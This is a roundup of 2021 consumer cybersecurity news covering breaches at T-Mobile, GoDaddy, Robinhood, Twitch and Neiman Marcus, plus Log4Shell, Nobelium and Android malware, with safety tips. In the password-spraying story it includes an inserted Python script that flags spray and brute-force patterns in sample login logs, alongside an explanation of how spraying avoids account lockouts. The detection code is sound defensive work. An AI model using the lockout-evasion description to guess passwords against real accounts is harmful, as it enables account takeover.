2021 Cybersecurity

T-Mobile reports details of another hack of its systems

Hackers had another field day at T-Mobile, or so it appears. After a massive data breach compromised the accounts of six million users in August, the T-Mo Report is citing internal documents that show the company uncovered “unauthorized activity” on some customer accounts. 

The organization said the activity was most likely either the viewing of customer proprietary network information (CPNI), an active SIM (subscriber identity module) swap by a malicious actor, or possibly both.

If it was CPNI, then the hackers could have taken advantage of a customer’s account name, phone number, rate plan, and more. “That’s not great, but it’s much less of an impact than the breach back in August had, which leaked customer social security numbers,” T-Mo said. 

On the other hand, if it was a SIM swap, things could be worse. Hackers could gain control of a customer’s phone number. In that situation, it could lead to the victim’s other online accounts being accessed via two-factor authentication codes sent to their phone number, T-Mo said. However, the document shared with T-Mo indicated that anyone affected by a SIM swap had lucked out and that action was reversed.

T-Mobile responds

When ConsumerAffairs asked T-Mobile for a comment about the breach, the company confirmed the issue and said that it has corrected it.

“We were informed [by] a very small number of customers that the SIM card assigned to a mobile number on their account may have been illegally reassigned or limited account information was viewed. Unauthorized SIM swaps are unfortunately a common industry-wide occurrence; however, this issue was quickly corrected by our team, using our in-place safeguards, and we proactively took additional protective measures on their behalf,” a company spokesperson said in an email.

In addition, T-Mobile Help responded to a question posted on Twitter by saying that it was “taking immediate steps to help protect all individuals who may be at risk from this cyberattack.” It followed by saying users could send it a direct message to discuss steps to increase account security.

T-Mo also reported that customers who notified T-Mobile of unauthorized activity on their account have had notes added to their account for reps to see when accessing them.

Meta says 50,000 users may have been stalked by private surveillance companies

Meta has encountered its first major headache under its new moniker. The company formerly known as Facebook has notified 50,000 global users of Facebook, WhatsApp, Instagram, and Messenger that they may have been targeted by private surveillance companies. 

Meta said the seven firms involved carried out a mix of “reconnaissance, engagement, and exploitation,” but they have now been completely barred from the company’s platforms.

Collecting information and compromising accounts

In a blog post describing the issue, Meta said the global “surveillance-for-hire” companies targeted people to collect intelligence and compromise their devices and accounts – not only on Meta’s platforms but across the whole internet in more than 100 countries.

“While these ‘cyber mercenaries’ often claim that their services only target criminals and terrorists, our months-long investigation concluded that targeting is in fact indiscriminate and includes journalists, dissidents, critics of authoritarian regimes, families of opposition and human rights activists,” explained Meta officials David Agranovich and Mike Dvilyanski.

Agranovich and Dvilyanski said Meta is trying to prevent this from happening again by sharing its findings with security researchers, other platforms, and policymakers. The company also issued cease and desist warnings to the companies involved and alerted people who may have been targeted to help them strengthen the security of their various Meta-connected accounts.

What actual good could come out of this

Despite the immediate concern, Meta said in its threat report that there’s actually some good that can come out of this situation. The company is requesting that governments and tech companies come together to work on three key components:

Greater transparency and oversight: Meta sees a need for more international oversight that establishes transparency and “know your customer” standards. These standards would cover social platforms and surveillance-for-hire entities so that they are held accountable.

Industry collaboration: Surveillance efforts show up differently depending on individual platforms, but Meta stated that industry-wide collaboration is critical if Big Tech wants to fully understand and stop adversarial surveillance efforts before they spin out of control.

Governance and ethics: While Facebook’s history is covered with faux pas that put the company’s trustworthiness in question at congressional hearings, Meta says it now welcomes domestic and international efforts to raise accountability through legislation, export controls, and regulatory actions. 

“We also encourage broader conversations about the ethics of using these surveillance technologies by law enforcement and private companies, as well as creating effective victim protection regimes,” Agranovich and Dvilyanski said.

The internet is ‘on fire’ due to the biggest zero-day exploit in history

If you find things a little squirrely with the internet as you begin your week, it may relate to a “zero-day” exploit called “Log4Shell” that has sent security experts scrambling. 

The vulnerability is a critical security flaw in an open-source logging software called “Log4j,” which is used by countless companies and data centers around the world. The difficult part is that when analysts attempt to plug holes created by Log4Shell, others seem to pop up as a result.

“The internet’s on fire right now,” Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike, told The Associated Press. “People are scrambling to patch,” he said, “and all kinds of people scrambling to exploit it.”

Why it’s such a threat

Log4Shell appears to be a major threat to internet companies. Reports have already circulated that iCloud, Amazon’s cloud service AWS, and Minecraft were targeted by hackers who used the vulnerability.

Hackers who use Log4Shell are reportedly able to run code inside of server systems and remotely take full control. Making the situation far more dangerous is the fact that this hack doesn’t require any interaction from the victim. Hackers can simply worm their way in, gain access, and do their damage.

“This is far worse than if individual devices were vulnerable, and I think it's an open question at this point exactly what kind of data attackers are probably pulling from Apple's services as we speak,” Thomas Reed, Malwarebytes director of Mac offerings, told Ars Technica.

“I’d be hard-pressed to think of a company that’s not at risk,” Joe Sullivan, a Cloudflare security officer, told the AP. He said that untold millions of servers might have the utility installed. 

Microsoft seizes control of malicious websites used by China-based hacking group

In its latest move to stop global hackers in their tracks, Microsoft’s Digital Crimes Unit (DCU) has throttled the activities of a China-based hacking group that it calls Nickel. 

A federal court in Virginia granted the company’s request to seize websites that Nickel planned to use to attack organizations in 29 countries, including the U.S. The upshot of Microsoft’s sheriff-like effort is that Nickel’s access to victims has been cut off and that the malicious websites it was using no longer have the ability to carry out attacks. 

Microsoft didn’t name Nickel’s specific targets but said at the top of the list of those spared were government agencies, think tanks, and human rights organizations because of the wealth of information the hackers could tap into for intelligence gathering. 

“There is often a correlation between Nickel’s targets and China’s geopolitical interests,” said Tom Burt, Microsoft’s Corporate Vice President, Customer Security & Trust. According to Burt, Nickel also targeted diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe, and Africa. 

Microsoft says it will remain relentless

Nickel may be the latest snake in the grass that Microsoft has gone after, but it’s not the first. The company said that DCU’s pioneering efforts have taken control of more than 10,000 malicious websites used by cybercriminals and nearly 600 sites used by nation-state actors so far. The tech giant said it has also proactively blocked the registration of some 600,000 sites to prevent hacking groups from using them to cause harm in the future.

However, Microsoft admitted that Nickel was not completely killed off, and it could come back for more. “Our disruption will not prevent Nickel from continuing other hacking activities, but we do believe we have removed a key piece of the infrastructure the group has been relying on for this latest wave of attacks,” Burt remarked.

He went on to say that nation-state attacks continue to proliferate in number and sophistication. While China may be the head of the Nickel snake, DCU has also disrupted nefarious attempts from Iran, Russia, and North Korea. 

“Our goal … is to take down malicious infrastructure, better understand actor tactics, protect our customers and inform the broader debate on acceptable norms in cyberspace. We will remain relentless in our efforts to improve the security of the ecosystem and we will continue to share activity we see, regardless of where it originates,” Burt concluded.

GoDaddy data breach exposes private data of 1.2 million customers

In a data breach alert published by the Securities and Exchange Commission (SEC), GoDaddy reported that the private data of as many as 1.2 million of its customers was exposed by hackers who wormed their way into the company's Managed WordPress hosting ecosystem.

Unfortunately, GoDaddy was a little late in putting measures in place to curb the incident. The company told the SEC that it determined hackers first breached its systems on September 6, 2021, but that it didn’t take measures to block the hackers until November 17.

What happened

Demetrius Comes, GoDaddy’s Chief Information Security Officer, said the hack was pretty straightforward. Using a compromised password, the hackers accessed the provisioning system in GoDaddy’s code base for Managed WordPress. Managed WordPress hosting is something GoDaddy offers its clients -- sort of a jack of all trades platform where all the technical aspects of running a website are handled by GoDaddy, freeing the website owner from having to take care of those things.

When the company first spotted the hack, it immediately began an investigation with the assistance of an IT forensics firm. Comes said GoDaddy also contacted law enforcement. 

“Upon identifying this incident, we immediately blocked the unauthorized third party from our system. … Our investigation is ongoing,” Comes said. As to what the hackers had access to, he offered the following: 

  • Up to 1.2 million active and inactive Managed WordPress customers had their email addresses and customer numbers exposed. The exposure of email addresses is serious because it presents a risk of phishing attacks.

  • The original WordPress Admin password that was set at the time of provisioning was exposed. If those credentials were still in use, GoDaddy reset those passwords.

  • For active customers, FTP and database usernames and passwords were exposed. GoDaddy says it reset both passwords.

  • For a subset of active customers, the SSL private key was exposed. Comes said the company is in the process of issuing and installing new certificates for those customers.

Are you a GoDaddy customer?

Comes said the company is in the process of contacting everyone who was impacted directly by the hack. However, he stated that customers can also contact GoDaddy via its help center.

“We are sincerely sorry for this incident and the concern it causes for our customers. We, GoDaddy leadership and employees, take our responsibility to protect our customers’ data very seriously and never want to let them down,” Comes said in closing. “We will learn from this incident and are already taking steps to strengthen our provisioning system with additional layers of protection.”

Robinhood hack exposes data on 5 million users

Robinhood, the trading app made up of users who drove this year’s Reddit stock craze, reports that it has suffered a data breach in which the names and email addresses of millions of traders were stolen. In a blog post, the company emphasized that no Social Security or bank account numbers were compromised, and none of its users suffered any financial loss.

The company said the hacker gained access to Robinhood’s network systems by impersonating an authorized party to a customer-support employee on the phone. Officials said the breach was discovered late Wednesday of last week and quickly contained.

Robinhood said the hacker demanded a ransom payment at one point, but the case was turned over to law enforcement to handle. The company also retained the services of Mandiant, a cybersecurity firm.

“As a Safety First company, we owe it to our customers to be transparent and act with integrity,” said Robinhood chief security officer Caleb Sima. “Following a diligent review, putting the entire Robinhood community on notice of this incident now is the right thing to do.” 

5 million email addresses

The company says an investigation into the hack shows that the hacker was able to steal a list of email addresses for approximately five million users, as well as full names for a different group of approximately two million people. 

Robinhood also believes the hackers gained more extensive data on about 310 users. Again, it doesn’t think any financial information was compromised, but hackers may have gained access to names, dates of birth, and zip codes for that small group of customers.

Robinhood gained millions of customers during the pandemic when homebound Americans used its app to trade stocks, in many cases driving up the price of so-called “meme” stocks like GameStop and AMC.

Disruptive force

The company has been a disruptive force in the financial services industry by not charging commissions on trades. Now, nearly all online trading platforms have done away with commissions on stock trades.

Robinhood customers seeking information on how to keep accounts secure can visit Help Center, then tab through My Account & Login and Account Security. 

When in doubt, users may log in to view messages from the company. Robinhood also points out that it will never include a link to access a user’s account in a security alert.

Hackers breached several government sectors in recent cyberattack, security firm says

Foreign hackers are suspected to have forced their way through the computer systems of nine organizations in the defense, education, energy, health care, and technology sectors. Those organizations are spread throughout the world, but according to findings that security firm Palo Alto Networks shared with CNN, at least one is in the U.S. 

Security analysts believe the hackers are set on stealing key data from U.S. defense contractors and other sensitive targets. The hackers reportedly targeted organizations with passwords that could provide ongoing access to government networks. 

Ryan Olson, a senior Palo Alto Networks executive, told CNN that it was sort of a race to the finish. Once the intruders laid their hands on the passwords, it’s possible that they would be in a good position to intercept sensitive data sent via email or stored on computer systems.

NSA and U.S. Cybersecurity and Infrastructure Security Agency (CISA) officials said they are tracking the threat. 

Eyes on China

Olson said the nine confirmed targets are the "tip of the spear" of the surveillance campaign, and he expects that even more victims will be revealed. Olson couldn’t lay blame at any particular group’s feet, but he said some of the tactics the hackers employed are similar to those used by a known Chinese hacking group.

Chinese state hackers have been behind a number of cyberattacks over the course of the last year. Just this summer, France claimed that Chinese state hackers were using compromised routers in a massive attack campaign. The Biden administration also accused China of being behind major cyberattacks like the Microsoft Exchange hack.

In July, a federal grand jury charged four nationals and residents of the People’s Republic of China with a campaign to hack into the computer systems of dozens of victim companies, universities, and government entities in the U.S. and abroad. In October, the Federal Communications Commission (FCC) recognized potential security risks connected to China Telecom and banished the company from the U.S. 

Facebook shuts down use of facial recognition and pledges to delete data

People who have shied away from Facebook over privacy issues will be happy to know that it’s shutting down its facial recognition system. The company announced that the recognition technology that automatically recognized when a member appears in a photo is officially going away…for now.

Facebook’s active daily users who had previously opted into allowing the technology won’t have to lift a finger; they’ll simply no longer be automatically recognized in photos and videos on the platform. The company said it’s not going to archive anything it has in its system. It will delete more than a billion people’s individual facial recognition templates. 

Facebook users who were hoping to continue using the facial recognition technology to see suggested tags with their names in photos and videos are out of luck. The company says those people will have to tag posts the old-fashioned way -- manually. 

“We need to weigh the positive use cases for facial recognition against growing societal concerns, especially as regulators have yet to provide clear rules,” Jerome Pesenti, VP of Artificial Intelligence, said in a blog post.

The change will likely save Facebook some money in the long run. Over the past few years, the company ran afoul of its users when it launched its '10-Year Challenge' promotion, and it has forked over hundreds of millions of dollars to settle facial recognition lawsuits.

One of the largest shifts in facial recognition history

Pesenti said Facebook’s move is momentous on a privacy level and represents one of the largest shifts in facial recognition usage in the technology’s history. 

However, the company still believes that facial recognition has a place in the world -- like at airports where the Department of Homeland Security uses facial recognition to identify people wearing face masks because of the pandemic. Because of that, it left the door slightly ajar for using the technology again on some level in the future.

“Looking ahead, we still see facial recognition technology as a powerful tool, for example, for people needing to verify their identity, or to prevent fraud and impersonation,” Pesenti said. “We believe facial recognition can help for products like these with privacy, transparency and control in place, so you decide if and how your face is used. We will continue working on these technologies and engaging outside experts.”

FCC bans China Telecom from operating in the U.S.

As of December 26, 2021, China Telecom Americas will no longer be doing business in the U.S. Citing security concerns, the Federal Communications Commission (FCC) issued an order on Tuesday that prevents China Telecom from providing any domestic or international services in the U.S.

The move is a major blow for China Telecom because its mobile virtual network in the U.S. includes more than 4 million Chinese Americans, 2 million Chinese tourists a year visiting the United States, 300,000 Chinese students at American colleges, and more than 1,500 Chinese businesses.

However, it wasn’t completely unexpected. In 2020, the Executive Branch warned that it was considering shutting down the U.S. operations of state-controlled Chinese telecommunications companies, including China Telecom Americas. 

Officials had offered China Telecom a chance to disprove the agency’s findings, and they established a process that allowed for China Telecom, the U.S. Executive Branch agencies, and the public to present any remaining arguments or evidence regarding the matter.  

“The Federal Communications Commission has a long history of working to open American markets to foreign telecommunications companies when doing so is in the public interest,” Chairwoman Jessica Rosenworcel said.  

“These connections can make us stronger because they help share our democratic values with the rest of the world. But we also recognize not every connection is consistent with the national security interest of the United States. That’s because some countries may seek to exploit our openness to advance their own national interests. When we recognize this is the case and cannot mitigate the risk, we need to take action to protect the communications infrastructure that is so critical to our national security and economic prosperity.”

FCC offers to help China Telecom’s U.S. users

Fortunately for China Telecom’s U.S. users, the FCC is not leaving them out in the cold. The agency said it will help customers transition to other mobile service providers. Officials say they will issue a guide that outlines what other options consumers might consider for mobile services.  

This document will be available in English, Simplified Chinese, and Traditional Chinese and made available on the FCC’s website. 

Microsoft accuses Russian hackers of attacking the global technology supply chain

Cybersecurity specialists at the Microsoft Threat Intelligence Center (MSTIC) claim that the Russian-linked hacking group behind the attacks on SolarWinds, JBS, and others last year is at it again -- this time going after key players in the global technology supply chain.

The group, known as Nobelium, has “been attempting to replicate the approach it has used in past attacks by targeting organizations integral to the global IT supply chain” according to Tom Burt, Microsoft’s corporate vice president of customer security and trust. So far, the group has allegedly targeted more than 140 IT resellers and service providers and compromised as many as 14 since May. 

“Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling … targets of interest to the Russian government,” Burt said in a blog post.

Hackers use "password spraying" technique

The hackers’ favorite technique this time around is reportedly something called a “password spray.” In this attack, a small set of commonly used passwords such as “123456789,” “Password123,” and “picture1” is tried against a vast number of account usernames, rather than many passwords against one account.

DoubleOctopus -- a cybersecurity company focused on password protection -- says that even though password spraying is a slow-and-go technique, it allows hackers to stay undetected because each account sees only a guess or two, which avoids the rapid or frequent account lockouts that would otherwise raise an alarm. That makes it different from traditional attacks that attempt to gain unauthorized access by guessing one account’s password over and over.
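The lockout-avoidance pattern described above is also what a defender can look for: a single source that fails against many different accounts while staying under the lockout threshold on each one. The following is an added example, not code from the page, Microsoft or DoubleOctopus. It assumes a simple one-line-per-attempt log format, the account names, timestamps and RFC 5737 test addresses in `SAMPLE_LOG` are constructed, and the thresholds (five accounts in an hour to call a spray, five failures on one account to call brute force) are illustrative. It goes slightly beyond the passage by distinguishing a spray from a classic single-account brute-force run in the same pass.

```python
"""Password-spray versus brute-force classification over constructed auth logs.

Added example: the log format, thresholds and addresses are assumptions made for
illustration, not data from the page, Microsoft or DoubleOctopus.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample log (not from a real system), using RFC 5737 test addresses:
#   203.0.113.5   fails once each against six different accounts -> password spray
#   198.51.100.7  fails six times against a single account       -> brute force
#   192.0.2.9     fails once, then logs in                       -> benign
SAMPLE_LOG = """\
2021-10-25T08:00:01Z LOGIN_FAILED user=alice src=203.0.113.5
2021-10-25T08:03:12Z LOGIN_FAILED user=bob src=203.0.113.5
2021-10-25T08:06:40Z LOGIN_FAILED user=carol src=203.0.113.5
2021-10-25T08:09:55Z LOGIN_FAILED user=dave src=203.0.113.5
2021-10-25T08:13:02Z LOGIN_FAILED user=erin src=203.0.113.5
2021-10-25T08:16:30Z LOGIN_FAILED user=frank src=203.0.113.5
2021-10-25T08:01:00Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:01:02Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:01:04Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:01:06Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:01:08Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:01:10Z LOGIN_FAILED user=alice src=198.51.100.7
2021-10-25T08:20:00Z LOGIN_FAILED user=bob src=192.0.2.9
2021-10-25T08:20:15Z LOGIN_OK user=bob src=192.0.2.9
"""

# Assumed log format: "<ISO-8601 UTC timestamp> <LOGIN_FAILED|LOGIN_OK> user=<name> src=<ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<result>LOGIN_FAILED|LOGIN_OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

SEVERITY = {"benign": 0, "password_spray": 1, "brute_force": 2}


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    failed: bool
    user: str
    src: str


def parse_log(text: str) -> List[AuthEvent]:
    """Parse the assumed format; lines that do not match are skipped, not fatal."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(AuthEvent(ts, m["result"] == "LOGIN_FAILED", m["user"], m["src"]))
    return events


def classify_sources(
    events: List[AuthEvent],
    window: timedelta = timedelta(hours=1),
    min_spray_accounts: int = 5,
    lockout_threshold: int = 5,
) -> Dict[str, dict]:
    """Classify each source IP by the worst failure pattern seen in any sliding window.

    A spray spreads a few guesses over many accounts and stays under the lockout
    threshold on every one of them; brute force pushes one account past it.
    """
    failures = defaultdict(list)
    for e in events:
        if e.failed:
            failures[e.src].append(e)

    report = {}
    for src, fails in failures.items():
        fails.sort(key=lambda e: e.ts)
        best = ("benign", 0, 0)  # (label, distinct accounts, max failures on one account)
        start = 0
        for end in range(len(fails)):
            # Advance the window start so fails[start:end + 1] spans at most `window`.
            while fails[end].ts - fails[start].ts > window:
                start += 1
            per_account = defaultdict(int)
            for e in fails[start:end + 1]:
                per_account[e.user] += 1
            distinct, worst = len(per_account), max(per_account.values())
            if worst >= lockout_threshold:
                label = "brute_force"
            elif distinct >= min_spray_accounts:
                label = "password_spray"
            else:
                label = "benign"
            # Keep the most severe finding; on a tie, the one covering more accounts/attempts.
            if (SEVERITY[label], distinct, worst) > (SEVERITY[best[0]], best[1], best[2]):
                best = (label, distinct, worst)
        report[src] = {
            "classification": best[0],
            "distinct_accounts": best[1],
            "max_per_account": best[2],
        }
    return report


if __name__ == "__main__":
    for src, finding in classify_sources(parse_log(SAMPLE_LOG)).items():
        print(src, finding)
```

The thresholds should be set from the identity provider's actual lockout policy so that a spray staying one guess under it is still caught. Grouping by source address is deliberately simple; a spray that rotates through many addresses will not cluster this way, and a second pass keyed on the number of distinct accounts failing in the window regardless of source is the usual complement.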

In this situation, online users appear to be at the mercy of the service providers and platforms they use to protect their accounts. To that end, Microsoft recommends that companies with online customer systems implement a specific set of protocols to thwart recent Nobelium activity.

Putting protective measures in place

While consumers may need to depend on companies to protect them to some extent, there are still some things they can do to gain an advantage against hackers. In an interview with USA Today, Craig Danuloff, CEO of The Privacy Co., offered these tips to make personal passwords and information less susceptible:

Do not reuse passwords on any important accounts. Keeping your passwords unique helps ensure that hackers can’t access all of your important accounts if they figure out just one of your passwords.

Use two-factor authentication wherever possible. Amazon, Apple, Google, and other major tech players use this method because it works well. Here’s a guide that goes over two-factor authentication and other cybersecurity steps you can take to protect yourself.

Choose platforms that use end-to-end encryption. This is a method that Zoom now uses after learning a valuable lesson without it. “Files or photos sitting in cloud storage can be stolen,” Danuloff said. “If they’re in a database that has no keys or just one master key, all of your personal data has a much higher likelihood of being stolen, accessed, and maybe even shared publicly.”

Don’t give up your data to every site that asks for it. “Data that isn’t there can’t be stolen,” Danuloff said. All kinds of services ask for your address, phone number, or even your Social Security number. “The vast majority of them don’t need it,” he said. So give them “alternative facts.” Use burner email accounts. 

Use a personal monitoring service -- aka ID theft protection -- that informs you when your data has been stolen in a hack or when there are signs of identity theft. 

U.S. bolsters efforts to go after cryptocurrency crime

October is turning out to be a bad month for cryptocurrency lawbreakers. On Thursday, the U.S. Department of Justice announced that it has created a special team of its own to keep criminal misuses of cryptocurrency to a minimum. 

In the agency’s announcement, Deputy Attorney General Lisa O. Monaco said the National Cryptocurrency Enforcement Team (NCET) will not only tackle thorny investigations and prosecutions of criminal misuses of cryptocurrency. She said it will also be especially vigilant regarding crimes committed by virtual currency exchanges, mixing and tumbling services, and money laundering. 

The new team will also assist in tracing and recovery of assets lost to fraud and extortion, including cryptocurrency payments to ransomware groups, such as the one involved in the Colonial Pipeline attack earlier this year.

“Today we are launching the National Cryptocurrency Enforcement Team to draw on the Department’s cyber and money laundering expertise to strengthen our capacity to dismantle the financial entities that enable criminal actors to flourish — and quite frankly to profit — from abusing cryptocurrency platforms,” said Monaco. “As the technology advances, so too must the Department evolve with it so that we’re poised to root out abuse on these platforms and ensure user confidence in these systems.”

Diving deep to find crypto criminals

The NCET realizes that the people behind cryptocurrency crimes can be sneaky, often doing their deeds in what the agency called “dark markets” -- the underbelly of the internet where illegal drugs, weapons, hacking tools, and malware are sold. To get to those people, the DOJ will use the expertise of the Criminal Division to “deter, disrupt, investigate, and prosecute criminal misuse of cryptocurrency, as well as to recover the illicit proceeds of those crimes whenever possible.”

Because those dark markets and bad actors are difficult to find and bring to justice, the NCET said it will foster the development of a higher level of expertise in cryptocurrency and blockchain technologies across all aspects of the Department’s work. 

The DOJ said it isn’t just doing this on a national scale. The new group said it will be providing support to international, federal, state, local, tribal, and territorial law enforcement authorities that are grappling with these new technologies and new forms of criminal tradecraft.

Twitch streaming platform suffers major hack

Twitch -- Amazon’s streaming service that’s focused on live video game broadcasts -- has experienced a massive data breach. The hacker responsible for the act says they have taken all the information they found on Twitch, including source code and user payout data, and leaked it online.

The anonymous hacker went further, posting a link to their bounty on 4chan on Wednesday and stating that their reason for leaking their stolen goods was to “foster more disruption and competition in the online video streaming space” because Twitch’s “community is a disgusting toxic cesspool.”

VideoGamesConsole (VGC), which first reported the hack, verified the leak as legitimate and that the files mentioned on 4chan are publicly available to download.

What to do

VGC advises anyone who uses Twitch to change their password and turn on two-factor authentication immediately. To change your password on Twitch, users can do the following:

  • Go to Twitch and log on with your existing username and password.

  • Click on your avatar in the top-right corner and choose Settings.

  • Go to the Security and Privacy option, locate the option that says “change password,” and complete the prompts to do so. 

VGC recommends that users opt for a longer password when making the change because they tend to be safer. Adding both uppercase and lowercase characters, numbers, and a special symbol or two (like $ or &) can make them even stronger.

Google issues major warning for 2 billion Chrome users

Google has put 2 billion Chrome users on high alert that its browser has suffered “zero-day” exploits that “exist in the wild” and affect Apple, Linux, and Windows systems. This is the ninth such attack so far this year.

In order to buy itself some extra time so users can upgrade to a safer version of Chrome, Google’s Srinivas Sista said the company is limiting access to bug details and links “until a majority of users are updated with a fix.” 

What Chrome users need to do ASAP

To get ahead of the situation for the short term, Google has released a critical update. Gordon Kelly, a Consumer Tech specialist at Forbes, says the company tends to roll out updates in a staggered fashion, so not everyone will get the notice at the same time. 

To check if you are protected, you can take these steps:

  • Click on the vertical three-dot icon in the upper right-hand part of your Chrome browser.

  • Then, go to Settings > Help > About Google Chrome.

  • If your Chrome version is 94.0.4606.71 or higher, then consider yourself safe. If your version is below that number, make it a point to check at least once a day to see if there’s an upgrade.

  • If the update is not yet available for your browser, check regularly for the new version.

Are there safer browsers than Chrome?

One of the reasons many people use Chrome is because the integration between Google Docs, YouTube, Google Drive, Google Calendar, Gmail, their Android devices, etc. makes things easier. But cybersecurity watcher Zak Doffman says Google’s latest issue should give users some serious pause.

“If you’re one of those users, this nasty new surprise just gave you a reason to quit,” he wrote following the announcement of the latest Chrome issue.

Do consumers have other decent choices? Doffman says yes. There’s Apple’s Safari, DuckDuckGo, Mozilla Firefox, and a fairly new browser called Brave. Each of those browsers tries to upset Google’s apple cart by placing an extra emphasis on privacy. In Brave’s case, it automatically blocks both ads and website trackers as part of its default settings. 

Even though Google announced it was phasing out third-party tracking cookies in its Chrome browser earlier this year, Doffman is still championing a different browser. 

“While it’s Firefox, DuckDuckGo and Brave that most vocally push the browser privacy agenda, it’s really Safari that has done the best job of exposing Chrome’s avaricious data harvesting machine at scale,” he wrote.

Even though much of Apple’s recent press has been about its new iPhones, Doffman says the company’s recent Safari update is a “genuine game changer” for privacy and security because of the addition of a new privacy weapon called Private Relay. 

“Put simply, this breaks the identity chain between you, the websites you visit and the ISP through which you access the internet,” he explained.

Neiman Marcus reports data breach affecting millions of customers

Neiman Marcus has alerted customers that a data breach last year may have exposed the payment records of 4.6 million customers.

The personal information for affected customers may have included names and contact information; payment card numbers and expiration dates but without CVV numbers; Neiman Marcus virtual gift card numbers without PINs; and usernames, passwords, and security questions and answers associated with Neiman Marcus online accounts. 

The company said it has alerted law enforcement and retained the services of a cybersecurity firm to investigate. The preliminary investigation shows that around 3.1 million payment and virtual gift cards were exposed, but the vast majority -- more than 85% -- were expired. 

The company said no active Neiman Marcus-branded credit cards were exposed and that there is no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.

"At Neiman Marcus Group (NMG), customers are our top priority," said Geoffroy van Raemdonck, the company’s CEO. "We are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information."

Incident occurred 17 months ago

The breach is believed to have occurred in May 2020, but the company only learned of it in recent days. Once it was aware that payment records had been exposed, the company said it began steps to protect customers.

The company required an online account password reset for affected customers who had not changed their password since May 2020. It also set up a call center to answer customers’ questions. The number is (866) 571-9725, and it is open Monday through Friday, 8 a.m. to 10 p.m. CST; Saturday and Sunday, 10 a.m. to 7 p.m. CST. Callers should be prepared to provide engagement number B019206. There’s also a webpage that provides additional information.

Cyberattacks on corporate entities have become more common in the last five years. Corporations are major targets for hackers. Earlier this year, a ransomware attack shut down a major gasoline pipeline.

Security researchers discover Apple Pay and Visa contactless payment hack

A team of security researchers has uncovered a new hack that could allow bad actors to make unauthorized charges through victims’ iPhones. 

In a demonstration to the BBC, researchers from the computer science departments of the University of Birmingham and the University of Surrey in the U.K. showed how cyber thieves could exploit an Apple Pay feature to make unauthorized contactless payments. According to the researchers, the problem lies in how Visa cards are set up in “Express Transit” mode in an iPhone's wallet. 

Express Transit is an Apple Pay feature that enables commuters to make quick contactless payments without having to unlock their phone. It’s similar to how a commuter might pay for a ride on New York City’s MTA, Los Angeles’ TAP, or Chicago’s CTA. 

How it works

In the demo, researchers showed how easy it was for them to make a Visa payment of £1,000 [$13,460 USD] without unlocking the phone or authorizing the payment. 

All a hacker has to do is set up a commercially available piece of radio equipment near where the iPhone might be used to make a payment, such as a retail store. The hacker can then trick the iPhone into thinking it’s dealing with a legitimate point-of-contact. 

The scary thing is that the crook’s phone and the payment terminal that’s being used don't need to be anywhere near the victim's iPhone. "It can be on another continent from the iPhone as long as there's an internet connection," said Dr. Ioana Boureanu of the University of Surrey.

Apple and Visa aren’t worried...yet

While the researchers may think the incursion is a real possibility, neither Apple nor Visa is sweating it quite yet. According to the BBC, Apple said the matter was "a concern with a Visa system.” Visa said its payments were secure and attacks of this type were impractical outside of a lab.

Visa told the BBC that it took all security threats seriously, but it says this isn’t something that consumers should worry about. 

"Visa cards connected to Apple Pay Express Transit are secure, and cardholders should continue to use them with confidence,” the company said. "Variations of contactless fraud schemes have been studied in laboratory settings for more than a decade and have proven to be impractical to execute at scale in the real world."

Protecting yourself

Regardless of whether this particular threat is viable, there are things consumers can do to lessen the chances of being victimized by a hacker trying to create unauthorized payments. First off, if you lose your phone, you can use Apple's iCloud to block Apple Pay or wipe the phone. You can also alert Visa and block any future payments.

"In the unlikely event that an unauthorised payment does occur, Visa has made it clear that their cardholders are protected by Visa's zero liability policy,” Apple said.

Over 10 million Android phones infected with malware that delivers monthly charges

Android phone owners got an unpleasant surprise on Tuesday. Researchers at mobile security company Zimperium reported the discovery of a piece of malware called “GriftHorse” -- a trojan that’s been unleashed on more than 10 million Android devices in 70+ countries. 

This isn’t your ordinary household malware. Its mission is to sucker users into granting permissions that allow the cybercrooks to force monthly premium service charges. Business is good, too. So far, researchers estimate that the GriftHorse mob is making between $1.5 million and $4 million per month.

Where trouble ensues

Zimperium’s zLabs team said the malware is delivered to consumers by malicious Android apps that appear harmless at first. However, chaos ensues after the apps hoodwink users into granting certain permissions. At that point, victims start getting charged every month for premium paid services that they get subscribed to without their knowledge or consent. 

“Upon infection, the victim is bombarded with alerts on the screen letting them know they had won a prize and needed to claim it immediately. These pop ups reappear no less than five times per hour until the application user successfully accepts the offer. Upon accepting the invitation for the prize, the malware redirects the victim to a geo-specific webpage where they are asked to submit their phone numbers for verification,” Zimperium’s Aazim Yaswant and Nipun Gupta explained.

“But in reality, they are submitting their phone number to a premium SMS service that would start charging their phone bill over €30 [$40 USD] per month. The victim does not immediately notice the impact of the theft, and the likelihood of it continuing for months before detection is high, with little to no recourse to get one’s money back.”

Zimperium warned Google about the threat, and the company responded by verifying and removing the malware apps from its Play Store. However, the malicious applications might still be available on unsecured third-party app repositories or on an Android user’s phone. To help users identify the problem-causing apps, Zimperium offers a full list of the affected apps here.

Microsoft warns hackers are exploiting a Windows vulnerability

Microsoft has issued a security alert to Windows users, warning that hackers have found and are currently exploiting a vulnerability in the operating system.

“Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows,” the company reported. “Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.”

The company said the hackers were likely to target victims through their use of Office documents. If users open a malicious document, they’ll end up with malware on their system.

